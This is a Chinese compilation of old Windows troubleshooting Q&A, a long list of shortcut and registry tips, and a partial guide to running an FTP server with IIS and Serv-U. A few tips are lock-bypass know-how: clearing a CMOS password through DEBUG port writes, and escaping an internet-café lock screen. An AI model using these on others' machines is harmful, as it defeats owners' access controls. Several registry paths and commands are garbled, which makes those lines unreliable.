    问：我从网上下载了一个外国电影(AVI格式)，还有一个Chinese.srt文件，估计应该是中文字幕文件，但是在播放时，并没有中文字幕，请问如何显示中文字幕。另外，我已下载安装了VobSub字幕软件，但也没有用。

    答：你看一下字幕文件的文件名是否和电影文件名一致。也就是说，除后缀名以外，主文件名要相同，另外，电影文件和字幕文件也要放在同一目录下才可以，你看一下是否满足了以上两个条件。

    C盘无故被占用

    问：近日发现C盘无故增大了很多，我并没有在上面安装任何软件，并发现一个文件名为＿RESTORE的文件夹由原来的500MB增大到2.1GB，我想将他删除但是系统提示无法删除，请问这个文件夹可不可以删除？有什么方法删除？

    答：你使用的应该是Windows Me系统吧，这个文件是Windows Me的系统还原文件。想删除它的话，进入控制面板，找到“系统”选项，用鼠标双击，在打开的系统属性对话框中依次选择“性能→文件系统→疑难解答”，在最下面的“禁用系统还原”选项前打上勾，确定后即可关闭还原功能。由于该文件是系统文件，是不能删除的，即使可以在DOS下删除，但系统重新启动后又会出现的。不过我们可以使用注册表将其改动一下，在注册表编辑器中依次打开HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServices，删除其中的“*StateMgr”项目，重新启动电脑后你就不会再看到_RESTORE文件夹了。

    在DOS下安装Windows 2000

    问：我新买了一台电脑，预装的DOS，我想安装Windows 2000，但听人说要先安装Windows 98，然后再安装Windows 2000，我感觉这样未免太麻烦了。请问能不能直接在DOS下安装Windows 2000啊？

    答：可以直接在DOS下安装Windows 2000。首先，电脑在启动时让系统加载光驱驱动，使在DOS下也可以访问光盘，然后进入DOS下的光盘安装目录，输入“cd i386”，进入安装程序目录。以后输入“Winnt”即开始安装Windows 2000了。这里惟一的不同是并不是我们平时使用的“Setup”命令。

    为何多出一个备份文件

    问：我的电脑安装的是Windows 2000系统，C盘容量是4GB，在给C盘做镜像时我给镜像文件起名为JX.gho，大小为2GB，但除了它还有另一个jx000001.gho的文件，大小是1.25GB，这个是什么文件？

    答：因为FAT32分区格式支持的最大单个文件大小是2GB，所以Ghost基于通用性和文件安全性方面的考虑，如果镜像文件的大小超过2GB的话，Ghost会自动把它分成若干个文件。在恢复的时候，Ghost会自动识别该序列的下一个文件。

    病毒保护引起的安装失败

    问：我有一台老式的品牌机电脑，原先的系统是Windows 98，我想升级为Windows XP。但是在安装Windows XP系统时系统提示出现错误“Boot sector writeVIRUScontinue (Y/N)？”然后就是死机，重新杀毒之后安装还是如此，请问是怎么回事？

    答：这是因为主板BIOS的设置中防病毒功能被打开的缘故。Windows在安装时会向硬盘的主引导区写入数据，如果主板BIOS的防病毒功能被打开，就会导致硬盘主引导区无法写入任何数据，使得安装程序无法继续运行，而导致死机。解决的方法很简单，只需在安装操作系统前，先暂时将主板的防病毒功能关闭即可，进入BIOS，选择BIOS FEATURES SETUP(BIOS功能设定)→“VIRUS WARNING”(病毒警告)或是“Anti-Virus Protection”(病毒保护)，将“Enabled0(开启)”改为“Disabled”(禁用)即可。

    按F1才能继续

    问：我的电脑在开机时必须要按一下F1键才能继续，以前不用这样的。请问该如何解决这个问题呢？

    答：遇到这种情况，一般是因为BIOS中的参数与实际的硬件不符造成的，你进入BIOS中看看有哪些选项设置不当，例如电脑中没有安装软驱却在BIOS中设置为“Enabled”，这样就会造成开机需按F1的现象。另外，也有可能是因为CMOS电池接触不良或电力耗尽所造成。

    开机后直接打开C盘

    问：最近我的电脑老出毛病，例如开机进入桌面后会直接打开C盘目录，这是为什么？

    答：有不少读者询问过这个问题，你是不是安装了Windows优化大师？如果你安装并选择了“桌面菜单优化”中的“启动系统时为桌面和Explorer创建独立的进程”项就会出现这个问题，去除该项即可。

    希望这篇文章能够解决长期困扰大家的问题。


电脑上的小技巧

《一键清理系统垃圾》

电脑上的小技巧

  1如果同时有多个窗口打开，想要关闭的话，可以按住shift不放然后点击窗口右 上角的关闭图标.
2.在保存网页前，可以按一下"ESC"键(或脱机工作)再保存,这样保存很快

3.用电脑听CD可以不用任何的播放软件，把音箱线直接接到光驱的耳机孔，放入 CD，按光驱上的play键就可以直接听了，这样听歌可以不占用系统资源。（如 果你的电脑坏了，不能启动或什么的，一时放在那不能修，千万不要浪费资源 ，把用里面的电源给光驱通上电，就可以暂时做CD机了.

4.MSN中发消息的时候是按enter的，如果想要换行而不想发出消息，可以 shift+enter或ctrl+enter

5.浏览器的地址栏里可以调试简短的HTML代码。方法如下： 地址栏写 about :abc 回车，就看到效果了.

6.Windows快捷键：
win+m 显示桌面
win+pause 系统属性
快速重新启动:按确定前先按shift(不适用于2k、xp）.
彻底删除:shift+del
不让光盘自动运行:按shift
Ctrl+Esc：相当于"开始"或WIN键
Ctrl+Home：将游标移至文字编辑区的开始始(Home单用：移至列首)
Ctrl+End：将光标移至文字编辑区的终点(End单用：移至列尾)
Alt+F4：关闭当前视窗（若是点一下桌面再按则为关机)
F2：更改名称
windows+e 资源管理器.
windows+r 运行.
windows+f 查找.
windows+u 关闭系统.
windows+d最小化所有窗口，再按一次Win+D可回到最小化前的窗口.
windows+m最小化所有窗口，但再按一次无法回到最小化前的窗口.
Shift+F10，可以打开所选项目的右键菜单.
按住 CTRL+SHIFT 拖动文件:创建快捷方式.

7.关机快捷方式
(1). 在桌面空白位置按鼠标右键 -> <新建> -> 选<快捷方式>
(2). 在<指令行>键入 rundll.exe user.exe,exitwindows
(3). 在<选择快捷方式 的名称>键入<关闭Window>或你想要的名称 -> 按<完成 >
8.重新启动快捷方式
(1). 重复以上 (1)
(2). 在<指令行>键入 rundll.exe user.exe,exitwindow***ec
(3). 在<选择快捷方式的名称>键入<重新启动Restart>或你想要的名称 -> 按< 完成>

9.RUN - > cmd 或者command
就会看到DOS窗口。不知道大家注意到那个小小的图标没有，在左上角。
点击这个图标， 就会看到下拉菜单， 尤其是Edit下的一些功能， 很方便

10.con、nul是MS系统的保留名，它不能做为文件名！检查你的web空间是不是M$ 系统，可以建一个con的文件夹试试

11.想把自己的某个文件夹的文件做一个列表? 用什么软件呢? 不用,直接在命令 行下输入 "tree /f > index.txt".打开index.txt看一下是不是一目了然

12.保存无边窗口页面请用CTRL+N新开窗口

13.如果一个文件夹下有很多文件，如果想快速找到想要的文件，先随便选择一个 文件，然后在键盘上选择想要的文件的第一个字母就可以了

14.说个QQ隐身登陆的笨办法:
在网吧上网，如果直接从注册向导登陆的话QQ是上线登陆的，可是有时候却不 希望现身，怎样实现隐身登陆呢？
就是拿一个没用的QQ先从注册向导登陆了，选择状态为隐身，然后在系统参数 中选中以隐身方式登陆，点确定，然后直接在这个QQ上运行注册向导登陆你要 登陆的QQ，你会发现现在QQ是隐身的了。

15.win98改ip不重启的办法：
1.改完ip选择取消。
2.在设备管理器里禁用改了ip的那块网卡。
3.启用网卡。
ok，你改的ip已经可以用了

16.2000和xp下运行"cmd"，进入dos窗口，复制和粘贴都用右键完成

17.收藏夹不要放在系统盘，以免忘了备份，每次装完系统用"超级魔法兔子“指 定路径

18.对于系统不明白的地方，平时多看windows自带的帮助，不要盲目去找人解决 ，也许帮助才是最快和最全的。（其余软件也是同理）

19.winxp自带批量重命名功能，只要选中一堆文件，选重命名，然后改第一个文 件，改完后，其他文件也会自动修改

20.上网时在地址栏内输入网址，系统会记录下来，虽然方便以后不用再重复，不 过如果是公用的机子，又不想让别人知道自己到过哪些地方，可以用“CTRL＋ O（字母O，不是0）”，这时对弹出一个“打开”对话框，在其中的地址栏内 输入网址，就不会被记录下来了.

21.IE快捷键：
Ctrl+W关闭窗口
F4打开地址拦的下拉选择网址
F6或ALT+D选择地址拦
空格键可以下翻页，Shift+空格则可以上翻页

22.如果你用foxmail，邮箱路径不在默认位置，可以修改account.cfg

23.NTFS分区上文件属性中有个“摘要”功能，很有用的，这样一些软件安装程序 是什么东东就不会忘了啊!

24.在IE的地址栏输入： javescript:alert(document．lastModified)可以得到网 页的更新日期.

25.通过网络共享时，尽量使用"运行"，\\ip地址共享文件名，而不要使用通过 “网上邻居”浏览访问，速度很慢，而且经常不全（特别是2000，xp)，还要 注意适当的运用$

26.在98下快速做启动盘，只要把windows/command/edb下的所有文件复制到干净 的软盘中就可以做98启动盘

27.运行pq分区失败，出现不可识别的分区，只要找到pq安装目录UTILITY的 PTEDIT32.EXE，可以把原分区还原为原来格式.
打开资源管理器，选中文件夹，用小键盘的*,可以把这个文件夹中的所存在的 所有子文件夹迅速列出

28.QQ自己加自己的方法：在黑名单中加自己，然后再把自己拖到我的好友中就可 以了,然后再运行注册向导.

29.如果浏览的页面中应用了javascript禁用了鼠标右键，解决的方法：
1、如“xiayupei”的方法，先按住鼠标左键，然后将鼠标移动到目标处，点击 鼠标右键，一两秒之后，快捷菜单出现.
2、单击鼠标右键，（不要放开鼠标右键），将鼠标移到警告窗口处，点击鼠标 左键，关闭窗口，再将鼠标移回目标处，放开鼠标右键，快捷菜单出现.

30.realplay多曲播放.
选中多个曲目,然后拖到realplay 的播放地址栏就可以了,之后找到那个ram(会 自动生成),复制里面的内容多遍就可以反复听歌曲.
31.windows下文件可以只有扩展名
新建一个文本文档另存为.txt.前面什么也不要加，就可以了，但是你不能重 命名为这样的文件名！要用另存为!

32.IE真正的空白页：
在IE的快捷方式中右击---属性--选择“目标”，这里的信息为：“ crogram FilesInterner ExplorerEXPLORER.exe",在它之后添加“ -nohome"字样即可。注意-nohome之前要有空格
快速设置主页：将IE地址栏里的“e”网页图标直接拖到工具栏上的“主页” 按钮图标上
不用重启也刷新注册表：同时按Ctrl+Alt+Del,在弹出的Windows任务列表中加 亮"Explore",单击“结束任务”，显示关机屏幕，单击：“否“，稍候，弹出 错误信息，单击“结束任务”，windows游览器即会和新和注册表一起重新装 载!
33.快速启动RealOnePlayer的技巧：在Real的文件夹下搜索netid.smi和 getmedia.ini将其改名为：betid_bak.smi和getmedia_bak.ini，然后再打开 试试,是不是快很多.

34.跳过开机画面
启动时按 esc 即可，或者干脆一点，修改 msdos.sys在options段落加入 logo=0

35.创建浏览目录的快捷方式
在桌面上创建一个快捷方式， 命令为：C: WINDOWSEXPLORER.EXE /n,/e,C:当你双击此快捷方式时，将会用“Windows资源管理器”浏览C:。 当然，你可以用其他的目录名来替换命令中的C:

36.改变关机画面:
记得以前可以改变开机画面吧,现在可以对关机画面动手喔!logow.sys 是等 待关机,logos.sys 是最後丑丑的 "您可以安全关机^_^都是 bmp 档,快动手 吧,原图是 320x400 , 256色!但是最後win95会把他放宽170%所以你可以先准 备一张 544x400 的图　再把这张图 resize 成320x400　再 rename 一下档名 就可以啦!（只能 256色喔　）而且最好注意一下色盘的问题*开机画面也可以 喔!logo.sys....

37.这个 .exe 用了哪些 .dll?　对应用程式右键单击,选 "快速检视"
笔者注快速检视必须另行安装,方法如下:a. 控制台/新增或移除程式/ Win95 安装程式 /附属应用程式/详细资料!b. 核取"快速检视"方块--确定

38.厌倦图形介面了吗　想念以前先进入 dos 在打 win 进窗户吗在 msdos.sys 中加入这一行BootGUI=0

39.在 win95的MS-DOS下使用长文件名
只需要在文件名前后加引号（""）即可。如：
c:>dir "windows utilities"
c:>cd "windows utilities"insteasy
c:>edit "The list of my friends.txt"
40.加快软驱传输速度
   往软盘上存贮较多资料时，让人等得真有点烦。我们不可能对软驱的机械结构 进行改造，但可以通过修改系统注册表以获得较高的数据传输速度，具体方法 如下：
打开系统注册表编辑器，找到
“HEKY-LOCAL-MACHINESystemCurrentControlsetServicesClassFCD00" ，在其右边的窗口空白处，占击鼠标的右健新建一个“DWORD”值，命名为 “ Fore-Fifo”，健值设定为“0”。 最后关闭注册表面化编辑器，重新启动电 脑，一切就OK了！

41.MSN背景修改：
是不是觉得MSN的背景很单调呢？那么很简单，找到你喜欢的图片，估计好大 小，最好是选择背景是透明的。命名为lvback.gif，找到目录Crogram FilesMessenger，将原来图片覆盖就OK了!

42.启动Winamp，并播放一首MP3
2.然后按住[SHIFT]不放，再单击面板上的“停止”按钮
3.你会发现音乐没有立即停止，而是逐渐降低音量直至完全消失，就象电台DJ 做的一样

43.1.启动QuickTime Movie Player，并打开一个mov文件
2.当它播放的时候，点击暂停按钮，然后按下[Shift]键，并双击播映窗口
3.电影开始倒放了，声音也是倒放的

44.在98下文件夹共享时，在共享名后面加个$可以把共享文件夹隐藏

45.Shift的另一个用法：
①大家经常使用Tab键、Spase键，但不知各位注意过没有，以上转换键都是顺 向的，但你按住Shift不放，再用上述按键时，他的转换方向是不是倒过来了？
②在英文输入时，如果在小写状态下，按住Shift同时输入的字母为大写，反之 亦然；

46.智能ABC输入法中字母 “v”的用法：
①、在智能ABC输入中，V + 数字（1～9），可以输入各种字符、图形、数字 等，一试便知，奇妙无穷，但我想大多数人早都用了吧？
②、在智能ABC输入中，在输入拼音的过程中（“标准”或“双打”方式下） ，如果需要输入英文，可以不必切换到英文方式。键入“v”作为标志符，后 面跟随要输入的英文，按空格键即可。

47.在以Word为代表的Office系列中，图形、文本框等非字符元素的位置的微调： 以Word为例，在页面中插入图形或文本框等非字符元素，在页面排版时，经常 为Word固有的所进所干扰，无法达到如意的效果。在使用中，笔者摸索出以下 经验，与大家分享：
①、在调整某一图片（或其他元素，以下全以图片为代）的位置时，使用鼠标 或方向键将其移动到大致位置时，按住Ctrl键，再用方向键移动，你会发现现 在图片每次移动的间距比原来要小得多了，在Word要求的精度下应当完全达到 您的要求了。
②、在调整某一图片（或其他元素，以下全以图片为代）的大小时，不使用鼠 标时，图片变化的大小不连续，按住Alt键，再调节，现在其大小就可以任意 调节了.

48.大伙有没有碰过电脑黑屏一现象呀？按ESC以后，桌面上是否还留有许多黑色 的影子呢？特别是下面的任务栏……不用鼠标找，就黑成一条了…………可以 按“开始”--“关闭计算机”--“取消”，既可恢复.

49.2000或者Xp下硬盘默认是共享的，即使你关闭共享，下次启动后还是会共享。
想要让域内的工作站不盗窃你的个人工作成果，尝试一下建立一个批处理文件 ，并放在all users的startup里（或者建一个快捷方式放在里面也可以）。内 容如下：net share c$ /delete
net share d$ /delete
net share e$ /delete

50.去除Windows 2000的默认共享
修改注册表：对于各server版：在注册表编辑器（regedit.exe）中依次找到“HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceslanmanserverparam eters”，之后在其下新建一个“双字节值”，取名为“AutoShareServer”的 ，并将其值设为“0”。之后重新启动服务器即可。对于professional版：同 上面一样 只是将AutoShareServer改为AutoShareWks

51.双击任务栏上的喇叭，如果觉得弹出音量控制面板占用桌面太打，或不能完全 显示，按Ctrl+S后就会以mini方式显示，想恢复再按一次Ctrl+S就OK

52.有时会遇到引导型病毒或是光驱找不到的情况，一般在dos下执行fdisk /mbr 重启就可以解决

53.在windows目录下有一个sendto文件夹
你可以把记事本的快捷方式放到里边去
然后在希望用记事本打开的文件上右键发送到中选这个记事本即可
也可以建立相应文件夹的快捷方式,比如music指向放音乐的文件夹

54.如何下载网页上的FLASH？
1 用FLASHGET的资源探索就能下载网页上的FLASH
2 到WINDOWS/Temporary Internet Files也能找到你要的FLSAH
3 用缓存拾贝这个小软件也能拿你要的FLASH

55.解决COMS锁住问题
在DOS命令行下打DEBUG
-O 70 2F
-O 71 2F
-Q

56.有时候按默认路径安装一个软件，安装时由于没有在意，事后不知安装在哪， 可以通过搜索（用当日时间），时间值最大的即为新装的文件，可以看出其所 在的路径.

57.我们单位工作已经离不开电脑（各部门间电脑已连成网），大多数职工还不会 使用电子信箱，领导要求用网络资源发放通知等。在这种情况下，笔者使用如 下方法（简单，易行，不花分文）
1.在任何一台电脑（作为邮件服务器）建立一个共享文件夹（只读），文件夹 命名为“XX”（信箱含义）。
2.在其他电脑的桌面建立一个快捷键（做好影射网络资源，指向作为邮件服务 器的共享文件夹），快捷键命名为“公众信箱”
3.将所有的“word”文件（通知），放在该文件夹内。
4.用户只要点击该快捷键，便可看到所有的通知了.

58.ping x.x.x.x 太快!改称 ping x.x.x.x -t

59.在网吧上网被美萍锁住：在ie地址兰里输入"桌面"有50%机会打开我的电脑， 利用一些东西比如文件->打开可以进行磁盘操作了.

60.用笔记本与投影仪搭配使用时有三种显示模式
1.笔记本屏幕有显示、投影仪不显示；
2.笔记本屏幕、投影仪均有显示；
3.投影仪有显示、笔记本屏幕无显示.
切换方法为按 Fn 键加F3（康柏的机子是这样的，也就是加上那个上面有个小 显示器图标的键啦）!

哈～～～再送一个杀毒软件！！！
卡巴斯基 Kaspersky Anti-Virus Personal Pro v
世界上最优秀、最顶级的网络杀毒软件，查杀病毒性能远高于同类产品。Kaspersky(卡巴斯基)杀毒软件具有超强的中心管理和杀毒能力，能真正实现带毒杀
Kaspersky(卡巴斯基)杀毒软件来源于俄罗斯，是世界上最优秀、最顶级的网络杀毒软件，查杀病毒性能远高于同类产品。Kaspersky(卡巴斯基)杀毒软件具有超强的中心管理和杀毒能力，能真正实现带毒杀毒!
AVP是俄罗斯软件公司的产品,是一个在国外评价极高杀毒软件。它也有常驻于System Tray的自动监视功能，可帮你自动监视从磁盘、网路上、E-mail 夹档中开启文件的安全性，亦有鼠标右键的快速选单，还附有 LiveUpdate 线上更新病毒码的功能。
Kaspersky为任何形式的个体和社团提供了一个广泛的抗病毒解决方案。它提供了所有类型的抗病毒防护：抗病毒扫描仪，监控器，行为阻段和完全检验。它支持几乎是所有的普通操作系统、e-mail通路和防火墙。Kaspersky控制所有可能的病毒进入端口，它强大的功能和局部灵活性以及网络管理工具为自动信息搜索、中央安装和病毒防护控制提供最大的便利和最少的时间来建构你的抗病毒分离墙。Kaspersky抗病毒软件有许多国际研究机构、中立测试实验室和IT出版机构的证书，确认了Kaspersky具有汇集行业最高水准的突出品质。


电脑上的小技巧

《一键清理系统垃圾》

电脑上的小技巧

  架设一台ＦＴＰ服务器其实很简单。首先，要保证你的机器能上网，而且有不低于ＡＤＳＬ ５１２Ｋｂｐｓ的网络速度。其次，硬件性能要能满足你的需要。最后，需要安装ＦＴＰ服务器端的软件，这类软件很多，可以使用微软的ＩＩＳ（Ｉｎｔｅｒｎｅｔ Ｉｎｆｏｒｍａｔｉｏｎ Ｓｅｒｖｅｒ 因特网信息服务系统），也可以使用专业软件。不同的

软件提供的功能不同，适应的需求和操作系统也不同。一般来说，系统最低要求如下：
ＣＰＵ：ＰⅢ ４５０ＭＨｚ以上
内存：２５６ＭＢ ＳＤＲＡＭ以上
带宽：ＡＤＳＬ ５１２Ｋｂｐｓ以上
至于操作系统，Ｗｉｎｄｏｗｓ ９８／Ｍｅ／ＮＴ／２０００／ＸＰ均可，如果对服务器的性能和安全性要求很低，可以采用Ｗｉｎｄｏｗｓ ９８和Ｗｉｎｄｏｗｓ Ｍｅ。本文中，如无特殊说明，均以Ｗｉｎｄｏｗｓ ＸＰ专业版为操作系统，其余操作系统下ＦＴＰ服务器的架设及设置均大同小异。

    一、用ＩＩＳ架设

    如果只是想建个小型的同时在线用户数不超过１０个的ＦＴＰ服务器，且不会同时进行大流量的数据传输，可以用ＩＩＳ ５．０作为服务器软件来架设（ＩＩＳ只适用于Ｗｉｎｄｏｗｓ ＮＴ／２０００／ＸＰ操作系统）。

    １．安装

    Ｗｉｎｄｏｗｓ ＸＰ默认安装时不安装ＩＩＳ组件，需要手工添加安装。进入控制面板，找到“添加／删除程序”，打开后选择“添加／删除Ｗｉｎｄｏｗｓ组件”，在弹出的“Ｗｉｎｄｏｗｓ组件向导”窗口中，将“Ｉｎｔｅｒｎｅｔ信息服务（ＩＩＳ）”项选中。在该选项前的“√”背景色是灰色的，这是因为Ｗｉｎｄｏｗｓ ＸＰ默认并不安装ＦＴＰ服务组件。再点击右下角的“详细信息”，在弹出的“Ｉｎｔｅｒｎｅｔ信息服务（ＩＩＳ）”窗口中，找到“文件传输协议（ＦＴＰ）服务”，选中后确定即可。
安装完后需要重启。Ｗｉｎｄｏｗｓ ＮＴ／２０００和Ｗｉｎｄｏｗｓ ＸＰ的安装方法相同。

２．设置

    电脑重启后，ＦＴＰ服务器就开始运行了，但还要进行一些设置。点击“开始→所有程序→管理工具→Ｉｎｔｅｒｎｅｔ信息服务”，进入“Ｉｎｔｅｒｎｅｔ信息服务”窗口后，找到“默认ＦＴＰ站点”，右击鼠标，在弹出的右键菜单中选择“属性”。在“属性”中，我们可以设置ＦＴＰ服务器的名称、

ＩＰ、端口、访问账户、ＦＴＰ目录位置、用户进入ＦＴＰ时接收到的消息等。

    １）ＦＴＰ站点基本信息

    进入“ＦＴＰ站点”选项卡，其中的“描述”选项为该ＦＴＰ站点的名称，用来称呼你的服务器，可以随意填，比如“我的小站”；“ＩＰ地址”为服务器的ＩＰ，系统默认为“全部未分配”，一般不须改动，但如果在下拉列表框中有两个或两个以上的ＩＰ地址时，最好指定为公网ＩＰ；“ＴＣＰ端口”一般仍设为默认的２１端口；“连接”选项用来设置允许同时连接服务器的用户最大连接数；“连接超时”用来设置一个等待时间，如果连接到服务器的用户在线的时间超过等待时间而没有任何操作，服务器就会自动断开与该用户的连接。

    ２）设置账户及其权限

    很多ＦＴＰ站点都要求用户输入用户名和密码才能登录，这个用户名和密码就叫账户。不同用户可使用相同的账户访问站点，同一个站点可设置多个账户，每个账户可拥有不同的权限，如有的可以上传和下载，而有的则只允许下载。

    ３）安全设定

    进入“安全账户”选项卡，有“允许匿名连接”和“仅允许匿名连接”两项，默认为“允许匿名连接”，此时ＦＴＰ服务器提供匿名登录。“仅允许匿名连接”是用来防止用户使用有管理权限的账户进行访问，选中后，即使是Ａｄｍｉｎｉｓｔｒａｔｏｒ（管理员）账号也不能登录，ＦＴＰ只能通过服务器进行“本地访问”来管理。至于“ＦＴＰ站点操作员”选项，是用来添加或删除本ＦＴＰ服务器具有一定权限的账户。ＩＩＳ与其他专业的ＦＴＰ服务器软件不同，它基于Ｗｉｎｄｏｗｓ用户账号进行账户管理，本身并不能随意设定ＦＴＰ服务器允许访问的账户，要添加或删除允许访问的账户，必须先在操作系统自带的“管理工具”中的“计算机管理”中去设置Ｗｉｎｄｏｗｓ用户账号，然后再通过“安全账户”选项卡中的“ＦＴＰ站点操作员”选项添加或删除。但对于Ｗｉｎｄｏｗｓ ２０００和Ｗｉｎｄｏｗｓ ＸＰ专业版，系统并不提供“ＦＴＰ站点操作员”账户添加与删除功能，只提供Ａｄｍｉｎｉｓｔｒａｔｏｒ一个管理账号。

    提示：匿名登录一般不要求用户输入用户名和密码即可登录成功，若需要，可用“ａｎｏｎｙｍｏｕｓ”作为用户名，以任意电子邮件地址为密码来登录。
４）设置用户登录目录

    最后设置ＦＴＰ主目录（即用户登录ＦＴＰ后的初始位置），进入“主目录”选项卡，在“本地路径”中选择好ＦＴＰ站点的根目录，并设置该目录的读取、写入、目录访问权限。“目录列表样式”中“ＵＮＩＸ”和“ＭＳ－ＤＯＳ”的区别在于：假设将Ｇ＼Ｆｔｐ设为站点根目录，则当用户登

录ＦＴＰ后，前者会使主目录显示为“＼”，后者显示为“Ｇ＼Ｆｔｐ”。
设置完成后，ＦＴＰ服务器就算真正建成了。如果前面ＩＰ地址为２１８．１．１．１，则用户使用ＦＴＰ客户端软件（用来登录ＦＴＰ服务器的上传／下载软件，如ＣｕｔｅＦＴＰ、ＦｌａｓｈＦＸＰ等，如无特别说明，本文中所称ＦＴＰ客户端软件均以ＣｕｔｅＦＴＰ Ｐｒｏ ２．０为例）时，主机处填２１８．１．１．１，端口填２１，此服务器的地址表述为：ｆｔｐ／／２１８．１．１．１２１。ＩＩＳ虽然安装简单，设置较简便，但功能不强，管理也很麻烦，尤其是连新建一个基本的授权访问账户都要进行繁杂的设置，而且ＩＩＳ本身的安全性也比较差，容易受到诸如“红色代码”等专门针对ＩＩＳ漏洞进行攻击的病毒侵袭，因而很多人都喜欢使用第三方的ＦＴＰ服务器软件来架设。
二、用Ｓｅｒｖ－Ｕ等第三方ＦＴＰ服务器软件架设

    除ＩＩＳ外，还有很多ＦＴＰ服务器软件可以架设，如Ｗｕ－ＦＴＰ、ＰｒｏＦｔｐｄ、Ｓｅｒｖ－Ｕ等，但大部分只适用于Ｕｎｉｘ、Ｌｉｎｕｘ系统，如果使用Ｗｉｎｄｏｗｓ系统，强烈推荐使用Ｓｅｒｖ－Ｕ。Ｓｅｒｖ－Ｕ（下载地址：ｈｔｔｐ／／ｗｗｗ．ｎｅｗｈｕａ．ｃｏｍ／ＦＴＰＳｅｒｖＵ．ｈｔｍ，含汉化包）是一种被广泛运用的ＦＴＰ服务器端软件，支持Ｗｉｎｄｏｗｓ ３ｘ／９ｘ／Ｍｅ／ＮＴ／２０００等全Ｗｉｎｄｏｗｓ系列。它安装简单，功能强大，可以用同一个ＩＰ设定多个ＦＴＰ服务器、限定登录用户的权限、登录主目录及空间大小、支持远程登录管理等，适合绝大部分个人自建ＦＴＰ的需要。

    １．安装

    Ｓｅｒｖ－Ｕ的安装比ＩＩＳ还简单。先执行英文原版安装文件，按提示一路“ＮＥＸＴ”即可。要注意的是，在选择安装目录时，最好选择安装在一个非系统盘里，以免将来系统发生异常时还要重新进行账号等的设置。然后执行汉化文件，选择原版安装目录，一路“下一步”即可完成安装。

    ２．设置

    与ＩＩＳ不同，Ｓｅｒｖ－Ｕ在第一次运行时会以向导的方式一步一步地提示用户进行设置，整个过程不超过五分钟，非常人性化。为了方便说明，先假设我们要架设一个固定ＩＰ为２１８．１．１．１，端口为２１，根目录绝对路径为Ｇ＼Ｆｔｐ，允许匿名访问和拥有一个用户名为ｄｙｓ、密码为ｓｙｄ、管理账户名叫“ＭｙＦｔｐ”的公网ＦＴＰ服务器。运行Ｓｅｒｖ－Ｕ，弹出向导窗口，依次设置如下选项：
１）“您的ＩＰ地址”：这里我们填入２１８．１．１．１，如果你是ＡＤＳＬ等方式拨号上网，拥有的是动态ＩＰ或者不知道本机ＩＰ，此处请留空。
    ２）“域名”：就是该ＦＴＰ站点的名称，可以随意取名，这里填入“ＭｙＦｔｐ”。
    ３）“匿名账号”：决定该ＦＴＰ站点是否允许匿名用户访问。选择“是”。
    ４）“匿名主目录”：设置匿名用户登录站点后所处的目录位置。输入“Ｇ＼Ｆｔｐ”。
    ５）“锁定于主目录”：假设在“匿名主目录”中设置匿名用户登录后所处的目录位置为“Ｇ＼Ｆｔｐ＼Ｇｕｅｓｔ”，那么，选择“是”后，当匿名用户登录ＦＴＰ后，就被锁定在Ｇ＼Ｆｔｐ＼Ｇｕｅｓｔ目录下，只能查看Ｇｕｅｓｔ目录里的内容，不能进入上级目录“Ｆｔｐ”，同时该目录在ＦＴＰ客户端软件中显示为“＼”，如果未被锁定，则会完整显示为“Ｇ＼Ｆｔｐ＼Ｇｕｅｓｔ”。这里选择“是”。
    ６）“命名的账号”：决定是否要创建有一定管理权限的账户。这里选“是”。
    ７）“账号名称”：就是具有一定管理权限的账户登录名称。填入“ｄｙｓ”。
    ８）“账号密码”：设置账户的登录密码。输入“ｓｙｄ”。
    ９）“主目录”：与“匿名主目录”一样，用来设置管理账户登录后所处的目录位置。输入“Ｇ＼Ｆｔ　　ｐ”。
    １０）“锁定于主目录”：选择“是”。
    １１）“管理员权限”：用来设置管理账户的管理权限级别。这里选“无权限”，后面再详述。
设置完成，地址为：ｆｔｐ／／２１８．１．１．１２１的ＦＴＰ服务器就算架设成功了。最后可用ＣｕｔｅＦＴＰ分别以匿名和ｄｙｓ的账户登录验证。
提示：以上这些设置并非最终设定，你还可以在Ｓｅｒｖ－Ｕ主界面中随时修改。

    ３．用同一个ＩＰ架设多个ＦＴＰ服务器

    如果带宽允许的话，你还可利用同一个ＩＰ轻松架设多个服务器。在Ｓｅｒｖ－Ｕ中，将“本地服务器”下“域”中的每个ＦＴＰ服务器称为“域”，刚才创建的“ＭｙＦｔｐ”服务器就是一个名叫“ＭｙＦｔｐ”的域。要架设多个服务器，实际上就是创建多个拥有不同端口的域而已。

    右击“域”，选“新建域”，在弹出的向导中参照“ＭｙＦｔｐ”进行设置，只是在端口处一定不要与已经创建的“域”的端口或被其他系统服务占用的端口冲突即可。如果填入２２，则此服务器的地址就是：ｆｔｐ／／２１８．１．１．１２２。依此而为，就可以架设多个ＦＴＰ服务器了。

    三、用动态ＩＰ域名解析软件架设拥有固定域名的ＦＴＰ服务器

    在上面的介绍中，我们假设的是该服务器拥有２１８．１．１．１的固定ＩＰ，而事实上，大部分想架设个人ＦＴＰ的用户通常都是用ＡＤＳＬ等方式拨号上网。由于每次拨号上网后被分配到的ＩＰ地址都不相同，那这是否就意味着不能架设ＦＴＰ服务器呢？
有两个解决办法：一是在刚才向导中的“您的ＩＰ地址”中留空，然后完成其它向导设置。进入Ｓｅｒｖ－Ｕ主界面，先点击菜单栏上的“帮助→本机ＩＰ地址”，将本机ＩＰ地址复制，再通过其他途径告知每个用户。每拨号上网一次就重复此操作一次；二是到网上下载安装一个动态ＩＰ域名解析软件，如国外的ＤＮＳ２Ｇｏ、国内的花生壳、８８ＩＰ等，此类软件不管本机的ＩＰ如何变化都能将一个固定域名自动解析到本机ＩＰ上。这样，用户只要输入这个固定域名作ＦＴＰ地址就可以访问到你的服务器。很明显，第一种方法相当麻烦，需要你有极大的耐心，第二种就相当简便，用户只要记住此域名而不用管ＩＰ是否变化。美中不足的是，目前绝大部分此类软件需要付费注册才能永久使用，不注册只能免费使用３０天。

    我们以８８ＩＰ为例，来了解它的设置。

    假设我们要申请一个域名：ｄｙｓ２．８８ｉｐ．ｃｏｍ。首先如前文所述用Ｓｅｒｖ－Ｕ（ＩＩＳ和其他ＦＴＰ服务器软件亦可）架设好ＦＴＰ服务器，注意将“您的ＩＰ地址”处留空，然后到ｈｔｔｐ／／ｗｗｗ．８８ｉｐ．ｎｅｔ去下载并安装８８ＩＰ标准版。

